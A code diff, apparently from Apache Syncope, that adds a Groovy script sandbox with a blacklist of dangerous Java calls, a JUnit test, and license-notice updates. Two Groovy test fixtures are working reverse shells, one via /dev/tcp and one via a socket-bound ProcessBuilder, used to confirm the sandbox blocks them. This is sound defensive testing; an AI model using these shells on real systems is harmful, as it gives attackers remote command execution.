+# Reflective access to Groovy
+method groovy.lang.GroovyObject getMetaClass
+method groovy.lang.GroovyObject getProperty java.lang.String
+method groovy.lang.GroovyObject invokeMethod java.lang.String java.lang.Object
+method groovy.lang.GroovyObject setMetaClass groovy.lang.MetaClass
+method groovy.lang.GroovyObject setProperty java.lang.String java.lang.Object
+
+# Raw file operations
+staticMethod java.io.File createTempFile java.lang.String java.lang.String
+staticMethod java.io.File createTempFile java.lang.String java.lang.String java.io.File
+new java.io.File java.lang.String
+new java.io.File java.lang.String java.lang.String
+new java.io.File java.net.URI
+staticMethod java.io.File listRoots
+new java.io.FileInputStream java.lang.String
+new java.io.FileOutputStream java.lang.String
+new java.io.FileOutputStream java.lang.String boolean
+new java.io.FileReader java.lang.String
+new java.io.FileWriter java.lang.String
+new java.io.FileWriter java.lang.String boolean
+new java.io.PrintStream java.lang.String
+new java.io.PrintStream java.lang.String java.lang.String
+new java.io.PrintWriter java.lang.String
+new java.io.PrintWriter java.lang.String java.lang.String
+new java.io.RandomAccessFile java.lang.String java.lang.String
+
+# No reflection!
+method java.lang.Class getConstructor java.lang.Class[]
+method java.lang.Class getConstructors
+method java.lang.Class getDeclaredConstructor java.lang.Class[]
+method java.lang.Class getDeclaredConstructors
+method java.lang.Class getDeclaredField java.lang.String
+method java.lang.Class getDeclaredFields
+method java.lang.Class getDeclaredMethod java.lang.String java.lang.Class[]
+method java.lang.Class getDeclaredMethods
+method java.lang.Class getField java.lang.String
+method java.lang.Class getFields
+method java.lang.Class getMethod java.lang.String java.lang.Class[]
+method java.lang.Class getMethods
+method java.lang.Class getResource java.lang.String
+method java.lang.Class getResourceAsStream java.lang.String
+method java.lang.Class newInstance
+
+# Same for local process execution.
+new java.lang.ProcessBuilder java.lang.String[]
+new java.lang.ProcessBuilder java.util.List
+method java.lang.Process start
+staticMethod java.lang.Runtime getRuntime
+staticMethod java.lang.System exit int
+
+# Leak information.
+staticMethod java.lang.System getProperties
+staticMethod java.lang.System getProperty java.lang.String
+staticMethod java.lang.System getProperty java.lang.String java.lang.String
+staticMethod java.lang.System getenv
+staticMethod java.lang.System getenv java.lang.String
+staticMethod java.lang.System nanoTime
+staticMethod java.lang.System setProperty java.lang.String java.lang.String
+
+# Could be used to read local files.
+method java.net.URL getContent
+method java.net.URL getContent java.lang.Class[]
+method java.net.URL openConnection
+method java.net.URL openStream
+
+# NIO file operations must start with a Path:
+staticMethod java.nio.file.Paths get java.lang.String java.lang.String[]
+staticMethod java.nio.file.Paths get java.net.URI
+
+# More process execution, Groovy-style:
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String java.lang.String[] java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String java.util.List java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String[]
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String[] java.lang.String[] java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.lang.String[] java.util.List java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.util.List
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.util.List java.lang.String[] java.io.File
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods execute java.util.List java.util.List java.io.File
+
+# JSON
+staticMethod groovy.json.JsonOutput toJson groovy.lang.Closure
+staticMethod groovy.json.JsonOutput toJson java.lang.Object
+
+# SECURITY-538
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods getAt java.lang.Object java.lang.String
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods getMetaPropertyValues java.lang.Object
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods getProperties java.lang.Object
+staticMethod org.codehaus.groovy.runtime.DefaultGroovyMethods putAt java.lang.Object java.lang.String java.lang.Object
+staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter asType java.lang.Object java.lang.Class
+staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class
+
+# SECURITY-1754
+new org.kohsuke.groovy.sandbox.impl.Checker$SuperConstructorWrapper java.lang.Object[]
+new org.kohsuke.groovy.sandbox.impl.Checker$ThisConstructorWrapper java.lang.Object[]

@@ -0,0 +1,69 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+package org.apache.syncope.core.spring.implementation;
+
+import static org.junit.jupiter.api.Assertions.assertThrows;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.when;
+
+import org.apache.cxf.helpers.IOUtils;
+import org.apache.syncope.common.lib.types.ImplementationEngine;
+import org.apache.syncope.core.persistence.api.entity.Implementation;
+import org.apache.syncope.core.provisioning.api.macro.MacroActions;
+import org.apache.syncope.core.spring.SpringTestConfiguration;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.condition.EnabledOnOs;
+import org.junit.jupiter.api.condition.OS;
+import org.springframework.test.context.junit.jupiter.SpringJUnitConfig;
+
+@SpringJUnitConfig(classes = { SpringTestConfiguration.class })
+class GroovySandboxTest {
+
+    @Test
+    void processBuilder() throws Exception {
+        Implementation impl = mock(Implementation.class);
+        when(impl.getKey()).thenReturn("processBuilder");
+        when(impl.getEngine()).thenReturn(ImplementationEngine.GROOVY);
+        when(impl.getBody()).thenReturn(IOUtils.toString(
+                getClass().getResourceAsStream("/ProcessBuilderMacroActions.groovy")));
+
+        MacroActions actions = ImplementationManager.build(impl);
+
+        SecurityException e = assertThrows(
+                SecurityException.class, () -> actions.afterAll(new StringBuilder()));
+        assertTrue(e.getMessage().contains("Insecure call to 'new java.lang.ProcessBuilder java.lang.String[]'"));
+    }
+
+    @EnabledOnOs(OS.LINUX)
+    @Test
+    void bash() throws Exception {
+        Implementation impl = mock(Implementation.class);
+        when(impl.getKey()).thenReturn("bash");
+        when(impl.getEngine()).thenReturn(ImplementationEngine.GROOVY);
+        when(impl.getBody()).thenReturn(IOUtils.toString(
+                getClass().getResourceAsStream("/BashMacroActions.groovy")));
+
+        MacroActions actions = ImplementationManager.build(impl);
+
+        SecurityException e = assertThrows(
+                SecurityException.class, () -> actions.afterAll(new StringBuilder()));
+        assertTrue(e.getMessage().contains("Insecure call to 'new java.io.File java.lang.String'"));
+    }
+}

@@ -36,7 +36,7 @@
 import org.springframework.test.context.junit.jupiter.SpringJUnitConfig;
 
 @SpringJUnitConfig(classes = { SpringTestConfiguration.class })
-public class ImplementationManagerTest {
+public class PasswordRuleTest {
 
     public static DefaultPasswordRuleConf createBaseDefaultPasswordRuleConf() {
         DefaultPasswordRuleConf baseDefaultPasswordRuleConf = new DefaultPasswordRuleConf();

@@ -25,7 +25,7 @@
 import org.apache.syncope.common.lib.policy.DefaultPasswordRuleConf;
 import org.apache.syncope.core.provisioning.api.serialization.POJOHelper;
 import org.apache.syncope.core.spring.SpringTestConfiguration;
-import org.apache.syncope.core.spring.implementation.ImplementationManagerTest;
+import org.apache.syncope.core.spring.implementation.PasswordRuleTest;
 import org.junit.jupiter.api.Test;
 import org.springframework.test.context.junit.jupiter.SpringJUnitConfig;
 
@@ -36,7 +36,7 @@ public class PasswordGeneratorTest {
 
     @Test
     public void digit() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setDigit(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -48,7 +48,7 @@ public void digit() {
 
     @Test
     public void alphabetical() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setAlphabetical(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -60,7 +60,7 @@ public void alphabetical() {
 
     @Test
     public void lowercase() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setLowercase(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -72,7 +72,7 @@ public void lowercase() {
 
     @Test
     public void uppercase() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setUppercase(1);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf));
@@ -84,7 +84,7 @@ public void uppercase() {
 
     @Test
     public void special() {
-        DefaultPasswordRuleConf pwdRuleConf = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf.setSpecial(1);
         pwdRuleConf.getSpecialChars().add('@');
         pwdRuleConf.getSpecialChars().add('!');
@@ -102,7 +102,7 @@ public void issueSYNCOPE678() {
         String password = passwordGenerator.generate(List.of());
         assertNotNull(password);
 
-        DefaultPasswordRuleConf pwdRuleConf1 = ImplementationManagerTest.createBaseDefaultPasswordRuleConf();
+        DefaultPasswordRuleConf pwdRuleConf1 = PasswordRuleTest.createBaseDefaultPasswordRuleConf();
         pwdRuleConf1.setMinLength(0);
         TestImplementation passwordRule = new TestImplementation();
         passwordRule.setBody(POJOHelper.serialize(pwdRuleConf1));

@@ -18,12 +18,19 @@
  */
 package org.apache.syncope.core.spring;
 
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.Reader;
 import org.apache.syncope.core.provisioning.api.ImplementationLookup;
 import org.apache.syncope.core.spring.security.DummyImplementationLookup;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.blacklists.Blacklist;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.EnableAspectJAutoProxy;
 import org.springframework.context.annotation.Primary;
 
+@EnableAspectJAutoProxy(proxyTargetClass = false)
 @Configuration(proxyBeanMethods = false)
 public class SpringTestConfiguration {
 
@@ -37,4 +44,13 @@ public ApplicationContextProvider applicationContextProvider() {
     public ImplementationLookup implementationLookup() {
         return new DummyImplementationLookup();
     }
+
+    @Bean
+    public Blacklist groovyBlackList() throws IOException {
+        try (InputStream is = getClass().getResourceAsStream("/META-INF/groovy.blacklist");
+                Reader reader = new InputStreamReader(is);) {
+
+            return new Blacklist(reader);
+        }
+    }
 }

@@ -0,0 +1,48 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+import groovy.transform.BaseScript
+import org.apache.syncope.core.provisioning.api.macro.MacroActions
+import java.io.Serializable
+
+abstract class BashMacroActions extends Script implements MacroActions {}
+@BaseScript BashMacroActions _
+
+@Override
+StringBuilder afterAll(StringBuilder output) {
+  def f = new File('/tmp/hello.sh')
+  f.withWriter { w ->
+    w.println('#!/bin/bash')
+    w.println('bash -i >& /dev/tcp/localhost/4444 0>&1')
+  }
+  f.setExecutable(true)
+
+  def p  = ['/bin/bash','-lc','/tmp/hello.sh'].execute()
+  def so = new StringWriter()
+  def se = new StringWriter()
+  p.consumeProcessOutput(so, se)
+  p.waitFor()
+
+  output
+  .append('\n[macro] wrote /tmp/hello.sh and executed it.\n[stdout]\n')
+  .append(so.toString()).append('\n')
+  if (se.toString()) {
+    output.append('[stderr]\n').append(se.toString()).append('\n')
+  }
+  return output
+}

@@ -0,0 +1,77 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+import groovy.transform.BaseScript
+import org.apache.syncope.core.provisioning.api.macro.MacroActions
+import java.io.Serializable
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+abstract class ProcessBuilderMacroActions extends Script implements MacroActions {}
+@BaseScript ProcessBuilderMacroActions _
+
+@Override
+StringBuilder afterAll(StringBuilder output) {
+  String host = "localhost";
+  int port = 4444;
+  String cmd = "bash";
+
+  Process p = new ProcessBuilder(cmd)
+  .redirectErrorStream(true)
+  .start();
+
+  Socket s = new Socket(host, port);
+
+  InputStream pi = p.getInputStream();
+  InputStream pe = p.getErrorStream();
+  InputStream si = s.getInputStream();
+
+  OutputStream po = p.getOutputStream();
+  OutputStream so = s.getOutputStream();
+
+  while (!s.isClosed()) {
+    while (pi.available() > 0) {
+      so.write(pi.read());
+    }
+    while (pe.available() > 0) {
+      so.write(pe.read());
+    }
+    while (si.available() > 0) {
+      po.write(si.read());
+    }
+
+    so.flush();
+    po.flush();
+
+    Thread.sleep(1);
+
+    try {
+      p.exitValue();
+      break;
+    } catch (Exception e) {
+      // ignored
+    }
+  }
+  ;
+  p.destroy();
+  s.close();
+
+  output.append('\nShell started...\n')
+  return output
+}

@@ -0,0 +1,22 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+# See http://www.slf4j.org/api/org/slf4j/impl/SimpleLogger.html
+# Possible values: "trace", "debug", "info", "warn", or "error"
+org.slf4j.simpleLogger.showDateTime=true
+org.slf4j.simpleLogger.dateTimeFormat=YYYY-mm-dd HH:mm:ss.SSS
+org.slf4j.simpleLogger.defaultLogLevel=debug

@@ -228,6 +228,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For FindBugs-jsr305 (http://findbugs.sourceforge.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Error Prone (https://errorprone.info/):
 This is licensed under the AL 2.0, see above.
 
@@ -248,7 +253,27 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For mchange-commons-java (https://github.com/swaldman/mchange-commons-java):
+For Nimbus Content Type (https://bitbucket.org/connect2id/nimbus-content-type/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Nimbus Language Tags (https://bitbucket.org/connect2id/nimbus-language-tags/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Nimbus JOSE-JWT (https://bitbucket.org/connect2id/nimbus-jose-jwt):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For OAuth 2.0 SDK with OpenID Connect extensions (https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Jakarta Mail:
 This is licensed under the EPL 1.0:
 
 Eclipse Public License - v 1.0
@@ -457,27 +482,12 @@ any resulting litigation.
 
 ==
 
-For Nimbus Content Type (https://bitbucket.org/connect2id/nimbus-content-type/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Nimbus Language Tags (https://bitbucket.org/connect2id/nimbus-language-tags/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Nimbus JOSE-JWT (https://bitbucket.org/connect2id/nimbus-jose-jwt):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For OAuth 2.0 SDK with OpenID Connect extensions (https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions/):
+For HikariCP (http://brettwooldridge.github.io/HikariCP/):
 This is licensed under the AL 2.0, see above.
 
 ==
 
-For Eclipse Metro (https://projects.eclipse.org/projects/ee4j.metro):
+For Jakarta Activation (https://eclipse-ee4j.github.io/jaf/):
 This is licensed under the EDL 1.0:
 
 Eclipse Distribution License - v 1.0
@@ -505,21 +515,6 @@ WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWIS
 THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
 
-==
-
-For QDox (https://github.com/paul-hammant/qdox):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For HikariCP (http://brettwooldridge.github.io/HikariCP/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Jakarta Activation (https://eclipse-ee4j.github.io/jaf/):
-This is licensed under the EDL 1.0, see above.
-
 ==
 
 For Eclipse Implementation of JAXB (https://projects.eclipse.org/projects/ee4j.jaxb-impl):
@@ -591,6 +586,11 @@ This is licensed under the EPL 1.0, see above.
 
 ==
 
+For Jakarta Servlet (https://projects.eclipse.org/projects/ee4j.servlet):
+This is licensed under the EPL 1.0, see above.
+
+==
+
 For Jakarta WebSocket API (https://projects.eclipse.org/projects/ee4j.websocket):
 This is licensed under the EPL 1.0, see above.
 
@@ -1042,6 +1042,11 @@ This is licensed under the CDDL 1.0, see above.
 
 ==
 
+For Groovy Security Sandbox (https://github.com/Tirasa/groovy-security-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
 For ANTLR (https://www.antlr.org/):
 This is licensed under the BSD license, see above.
 
@@ -1062,11 +1067,6 @@ This is licensed under the MIT license, see above.
 
 ==
 
-For MojoHaus AnimalSniffer Maven Plugin (https://github.com/mojohaus/animal-sniffer):
-This is licensed under the MIT license, see above.
-
-==
-
 For StAX2 API (http://wiki.fasterxml.com/WoodstoxStax2):
 This is licensed under the BSD license, see above.
 
@@ -1077,6 +1077,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For groovy-sandbox (https://github.com/craftercms/groovy-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
 For Cryptacular (https://github.com/vt-middleware/cryptacular):
 This is licensed under the AL 2.0, see above.
 

@@ -1,5 +1,5 @@
 Apache Syncope
-Copyright 2012-2023 The Apache Software Foundation
+Copyright 2012-2025 The Apache Software Foundation
 
 This product includes software developed by:
 The Apache Software Foundation (http://www.apache.org/).
@@ -35,11 +35,6 @@ This product includes software developed by J2ObjC: Java to Objective-C Translat
 
 ==
 
-This product includes software developed by mchange-commons-java
-Copyright (C) 2015 Machinery For Change, Inc.
-
-==
-
 This product includes software developed by Nimbus Content Type
 Copyright 2020, Connect2id Ltd
 
@@ -60,13 +55,8 @@ Copyright 2012-2022, Connect2id Ltd
 
 ==
 
-This product includes software produced and maintained by Eclipse Metro
-All content is the property of the respective authors or their employers.
-
-==
-
-This product includes software developed by QDox.
-Copyright 2002-2009 Joe Walnes and QDox Project Team
+This product includes software developed by Jakarta Mail
+Copyright (c) 1997, 2021 Oracle and/or its affiliates. All rights reserved.
 
 ==
 
@@ -99,7 +89,7 @@ Copyright (c) 2020 Luke Hutchison
 
 ==
 
-This product includes software developed by Micrometer Application Metrics
+This product includes software developed by Micrometer Application Metrics.
 Copyright (c) 2017-Present VMware, Inc. All Rights Reserved.
 
 ==
@@ -124,6 +114,11 @@ All content is the property of the respective authors or their employers.
 
 ==
 
+This product includes software developed by the Eclipse Project for Jakarta Servlet.
+Copyright (c) 1997, 2024 Oracle and/or its affiliates and others. All rights reserved.
+
+==
+
 This product includes software produced and maintained by the Jakarta WebSocket project.
 All content is the property of the respective authors or their employers.
 
@@ -162,6 +157,12 @@ Copyright 2011-2016 Tirasa S.r.l. All rights reserved.
 
 ==
 
+This product includes software developed by Groovy Security Sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+Copyright (c) 2025 Tirasa
+
+==
+
 This product includes software developed by the ANTLR project.
 Copyright (c) 2012 Terence Parr and Sam Harwell. All rights reserved.
 
@@ -182,16 +183,16 @@ Copyright (c) 2004-present by the Checker Framework developers
 
 ==
 
-This product includes software developed by MojoHaus AnimalSniffer Maven Plugin
-Copyright (c) 2009, codehaus.org
+This product includes software developed by the Stax 2 Extension API Project.
 
 ==
 
-This product includes software developed by the Stax 2 Extension API Project.
+This product includes software developed by the Woodstox Project.
 
 ==
 
-This product includes software developed by the Woodstox Project.
+This product includes software developed by groovy-sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
 
 ==
 

@@ -208,7 +208,7 @@ This is Public Domain.
 
 ==
 
-For Bootstrap (http://getbootstrap.com/):
+For balanced-match (https://github.com/juliangruber/balanced-match):
 This is licensed under the MIT license:
 
  Permission is hereby granted, free  of charge, to any person obtaining
@@ -232,6 +232,16 @@ This is licensed under the MIT license:
 
 ==
 
+For base64-js (https://github.com/beatgammit/base64-js):
+This is licensed under the MIT license, see above.
+
+==
+
+For Bootstrap (http://getbootstrap.com/):
+This is licensed under the MIT license, see above.
+
+==
+
 For bootstrap-select (http://silviomoreto.github.io/bootstrap-select/):
 This is licensed under the MIT license, see above.
 
@@ -457,6 +467,16 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For FindBugs-jsr305 (http://findbugs.sourceforge.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Gson (https://github.com/google/gson):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Error Prone (https://errorprone.info/):
 This is licensed under the AL 2.0, see above.
 
@@ -482,7 +502,62 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For mchange-commons-java (https://github.com/swaldman/mchange-commons-java):
+For Microsoft OAuth 2.0 User Agent library for Java (https://github.com/Microsoft/oauth2-useragent):
+This is licensed under the MIT license, see above.
+
+==
+
+For Microsoft Azure Active Directory Authentication Library (ADAL) for Java (https://github.com/AzureAD/azure-activedirectory-library-for-java):
+This is licensed under the MIT license, see above.
+
+==
+
+For Nimbus Content Type (https://bitbucket.org/connect2id/nimbus-content-type/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Nimbus Language Tags (https://bitbucket.org/connect2id/nimbus-language-tags/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Nimbus JOSE-JWT (https://bitbucket.org/connect2id/nimbus-jose-jwt):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For OAuth 2.0 SDK with OpenID Connect extensions (https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Okta Java Management SDK (https://github.com/okta/okta-sdk-java):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Moshi (https://square.github.io/moshi/1.x):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For OkHttp (https://square.github.io/okhttp/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Okio (https://square.github.io/okio/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Retrofit (https://square.github.io/retrofit/):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Jakarta Mail:
 This is licensed under the EPL 1.0:
 
 Eclipse Public License - v 1.0
@@ -691,56 +766,6 @@ any resulting litigation.
 
 ==
 
-For Microsoft OAuth 2.0 User Agent library for Java (https://github.com/Microsoft/oauth2-useragent):
-This is licensed under the MIT license, see above.
-
-==
-
-For Nimbus Content Type (https://bitbucket.org/connect2id/nimbus-content-type/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Nimbus Language Tags (https://bitbucket.org/connect2id/nimbus-language-tags/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Nimbus JOSE-JWT (https://bitbucket.org/connect2id/nimbus-jose-jwt):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For OAuth 2.0 SDK with OpenID Connect extensions (https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Moshi (https://square.github.io/moshi/1.x):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For OkHttp (https://square.github.io/okhttp/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Okio (https://square.github.io/okio/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Retrofit (https://square.github.io/retrofit/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Jakarta Mail:
-This is licensed under the EPL 1.0, see above.
-
-==
-
 For JAX-B (http://jaxb.java.net/):
 This is licensed under the CDDL 1.0:
 
@@ -1192,6 +1217,11 @@ This is Public Domain.
 
 ==
 
+For css-vars-ponyfill (https://github.com/jhildenbiddle/css-vars-ponyfill):
+This is licensed under the MIT license, see above.
+
+==
+
 For DataTables (https://datatables.net/):
 This is licensed under the MIT license, see above.
 
@@ -1227,6 +1257,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For get-css-data (https://github.com/jhildenbiddle/get-css-data):
+This is licensed under the MIT license, see above.
+
+==
+
 For HAL Explorer (https://github.com/toedter/hal-explorer/):
 This is licensed under the MIT license, see above.
 
@@ -1247,6 +1282,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For jsonwebtoken.io (https://jsonwebtoken.io):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Micrometer Application Metrics (https://micrometer.io/):
 This is licensed under the AL 2.0, see above.
 
@@ -1277,6 +1317,11 @@ This is licensed under the EPL 1.0, see above.
 
 ==
 
+For Jakarta Servlet (https://projects.eclipse.org/projects/ee4j.servlet):
+This is licensed under the EPL 1.0, see above.
+
+==
+
 For Jakarta WebSocket API (https://projects.eclipse.org/projects/ee4j.websocket):
 This is licensed under the EPL 1.0, see above.
 
@@ -1292,6 +1337,11 @@ This is licensed under the CDDL 1.0, see above.
 
 ==
 
+For JSR107 (JCache) (https://github.com/jsr107/jsr107spec):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Expression Language 3.0 API (https://javaee.github.io/uel-ri/):
 This is licensed under the CDDL 1.0, see above.
 
@@ -1332,6 +1382,16 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For Material Components for the web (https://github.com/material-components/material-components-web):
+This is licensed under the MIT license, see above.
+
+==
+
+For Webfont - Material Design Icons (https://github.com/Templarian/MaterialDesign-Webfont):
+This is licensed under the MIT license, see above.
+
+==
+
 For Byte Buddy (https://bytebuddy.net/):
 This is licensed under the AL 2.0, see above.
 
@@ -1352,6 +1412,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For normalize.css (http://necolas.github.io/normalize.css/):
+This is licensed under the MIT license, see above.
+
+==
+
 For Groovy Extensions (https://github.com/ultraq/groovy-extensions/):
 This is licensed under the AL 2.0, see above.
 
@@ -1432,11 +1497,21 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For Ehcache (http://ehcache.org/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Java EE API modules repackaged as OSGi bundles in GlassFish:
 This is licensed under the CDDL 1.0, see above.
 
 ==
 
+For Glassfish Expression Language Implementation:
+This is licensed under the CDDL 1.0, see above.
+
+==
+
 For Jakarta JSON Processing (https://projects.eclipse.org/projects/ee4j.jsonp):
 This is licensed under the EPL 1.0, see above.
 
@@ -1597,56 +1672,6 @@ This is licensed under the MIT license, see above.
 
 ==
 
-For balanced-match (https://github.com/juliangruber/balanced-match):
-This is licensed under the MIT license, see above.
-
-==
-
-For base64-js (https://github.com/beatgammit/base64-js):
-This is licensed under the MIT license, see above.
-
-==
-
-For css-vars-ponyfill (https://github.com/jhildenbiddle/css-vars-ponyfill):
-This is licensed under the MIT license, see above.
-
-==
-
-For get-css-data (https://github.com/jhildenbiddle/get-css-data):
-This is licensed under the MIT license, see above.
-
-==
-
-For Material Components for the web (https://github.com/material-components/material-components-web):
-This is licensed under the MIT license, see above.
-
-==
-
-For Webfont - Material Design Icons (https://github.com/Templarian/MaterialDesign-Webfont):
-This is licensed under the MIT license, see above.
-
-==
-
-For normalize.css (http://necolas.github.io/normalize.css/):
-This is licensed under the MIT license, see above.
-
-==
-
